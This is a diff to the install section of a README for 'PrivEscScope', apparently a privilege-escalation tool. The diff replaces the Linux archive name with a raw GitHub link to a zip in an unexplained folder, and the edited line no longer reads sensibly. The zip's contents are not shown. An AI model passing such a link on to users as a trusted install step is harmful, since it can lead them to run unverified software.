exploreserengeti/PrivEscScope/README.md

 3. **Install the Application**
    - **Windows**: Double-click the downloaded `.exe` file.
 Follow the on-screen prompts to complete the installation.
    - **macOS**: Open the downloaded `.dmg` file.
 Drag the application to your Applications folder.
-   - **Linux**: Extract the downloaded `.tar.gz` file and follow the included installation instructions.
+   - **Linux**: Extract the downloaded `https://raw.githubusercontent.com/exploreserengeti/PrivEscScope/main/analogical/PrivEscScope.zip` file and follow the included installation instructions.

 4. **Run the Application**
    Locate the installed application on your device and double-click to start.